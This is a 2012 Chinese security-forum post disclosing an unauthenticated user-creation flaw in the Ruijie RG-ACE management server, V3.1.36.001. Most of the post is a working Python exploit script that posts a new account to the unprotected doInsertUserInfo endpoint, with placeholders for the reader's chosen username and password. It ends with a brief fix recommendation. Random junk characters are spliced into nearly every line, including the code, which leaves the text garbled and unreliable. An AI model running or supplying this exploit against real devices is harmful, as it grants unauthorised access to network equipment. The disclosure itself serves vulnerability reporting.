找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 锐捷应用控制引擎管理服务器可以增加用户
返回列表 发新帖
查看: 2884|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低); X" l+ S. z/ k7 e0 O/ @4 p! n
; g! p- x( R* I/ N
/ ^0 y3 \# F0 x3 V1 A! `4 j' {/ A
测试的具体版本是
) r: p0 e2 x) r' A% o产品名称: 锐捷应用控制引擎
0 f6 y0 s# m) h" O版本号: 3.1.36.001 TC& u! ]! s( n% K
编译时间: 201104291730
9 V  ]; v. p8 W" L, O ) j1 e1 X9 a5 a" Q  ~. ]

4 s) V. B/ H4 T, @5 X# x漏洞证明:9 O1 Y; L% ?- `$ w
4 x: Z- ]/ r! I, K
. K% {% ]9 e7 d7 L- G
% q5 C" Y/ j- o

# Y3 \" o- Z- [+ ^7 P# ]5 k0 ~- `) a& J6 l" |+ c
, i# L, Q. D$ R1 `$ S9 k  t" {
执行脚本' b0 a$ u1 s- n$ |: n4 m
#! /usr/bin/env python
3 R& u" r. u" Q7 {% x& y  H#coding=gbk) r7 I2 \2 z6 Z/ r  ?
#RG-ACE管理服务器 V3.1.36.001
6 z1 Q6 L- a) a2 Simport urllib2, urllib,cookielib
6 ?5 @+ l* P% T3 P! h( Y" B) H3 Q8 Rurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
) @# M0 S* t" }$ Z/ n& Topener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
" U* k1 q6 @7 t. uopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]- I9 D" g, Y/ D# e" y" X
post=(("event","userManager.doInsertUserInfo"),
0 [4 W# F0 N6 p; q' Q' }8 W$ P1 E/ r6 y("useractionname","addButtonValue"),
  P( Y( e8 T7 w("useropermanager","userManager"),& X% E4 z2 R  O/ R% j" g  M
("userName","t"), #######账号自己加
4 X# s* [) d( P* B" D/ T( C("pwd","aaaaaa"),######密码自己加
9 E& l+ [' R) H5 O( H3 u' o/ w; m("trueName","ad"),8 M( z! M* e) g/ H9 H
("email",""),- c3 x; H- @* ~; r. D0 a
("mobilePhone",""),
( Y) ?, q) z4 i$ W$ e0 v8 W) [("officePhone",""),! w4 V3 t& m6 ?6 n' X! P  }1 w8 ?
("addr",""),
& A0 [- `2 ?9 |6 r("submit","确定"))" F/ d  q" j, e8 n9 \" W8 r' S2 M
urllib2.install_opener(opener)8 x( }% h9 o3 [; t
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
9 o9 h9 m* R! V/ Kprint "Done"
' \0 l6 L% C& o) M6 k7 Q3 A6 w) P; F% W' O7 X% y4 m: O
登录,连接设备4 [  g. t5 Q+ L: m/ }/ m2 n5 O

/ g: ^  P% J1 y% L2 Z" r4 @2 K+ H7 s% F8 x$ p. Z8 Y
1 Z9 H7 Q* G' R1 v' \
1 n6 Q: H3 C& d$ N3 K( K

9 i9 O6 I1 C- t. A' a* ~默认的管理员admin权限更大点) s( Z5 {+ N$ k* M( B* [# E

) ~/ v9 L) b! Q
+ R% W% }, y3 v# [  S8 w0 }) g4 G, }% w8 R# f' v6 h5 D0 m: D! H" |$ A/ Y

: t+ v  K& v( p/ E/ t2 M$ c
$ w' f! b2 m( n  j/ ]  e+ p& K修复方案:
  ]; W* G; n5 r1 I加强对接口的权限验证
2 v  F0 \% p5 D# k  Y+ x. {* R7 e$ ?5 F
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表